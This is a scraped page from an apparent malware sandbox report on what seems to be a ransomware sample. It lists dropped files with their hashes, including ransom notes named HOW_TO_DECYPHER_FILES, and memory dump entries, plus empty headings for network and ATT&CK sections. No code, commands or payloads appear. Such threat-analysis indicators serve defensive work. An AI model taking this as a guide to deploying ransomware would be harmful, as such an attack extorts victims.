3ffeede7e1bc99c8132210f061e69f2c312a3169

SHA256
07cb51b3318fc74bef129b8fdfe57182e00de3c28a53943d3a4e3a308d62da90

SHA512
42d1f4bd7bced33d030286d109278f3059d100bf49007e039b3d157ba70d21bd44ed0ffcf7fb6dc9925fce8e536d3f97bf0608669933d4495f6e413ffe296075

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5ypbqvl.psk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

Filesize
1KB

MD5
1d5b4c81bc55a78d7d21f7bb97b72320

SHA1
669c3ce7febb6e504daf35b63f11668879a29f7e

SHA256
1c787300407a7abb5a9fa323790695f2da3da40db2e9db0c91845c72b7125db6

SHA512
f7936fc96cda4b5b1ffae1e22c98319078719f20e099f64de883cd60ed12bbf520d16220196dee28a133c544823c211ce906a029c888b9f1a1528bfc326cc759

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
446B

MD5
450b7a2b0b06f2a378649a79dc2416b3

SHA1
06f1ecceab940bc36d9e80c0c590a501439630fd

SHA256
ec9feb12d368421c465eba888172ed85643d4e8388b6438a9a6162033f3b3d8a

SHA512
eb13526bc8c7641d07eef9939d3a9e3b66ad7f0eb70b1e6259f4e1bbcb5bdbd8128a42e3ef987d5e87c015bf9134ecd408ae0440deb945f98851402cbede4a11

Download Submit
memory/1632-1-0x00000000005B0000-0x00000000005CC000-memory.dmp

Filesize
112KB

Download
memory/1632-2-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download
memory/1632-0-0x00007FF9C3E53000-0x00007FF9C3E55000-memory.dmp

Filesize
8KB

Download
memory/1632-244-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download
memory/5888-9-0x000002DC7A870000-0x000002DC7A892000-memory.dmp

Filesize
136KB

Download
memory/5888-19-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download
memory/5888-16-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download
memory/5888-15-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download
memory/5888-14-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download
memory/5888-8-0x00007FF9C3E50000-0x00007FF9C4912000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.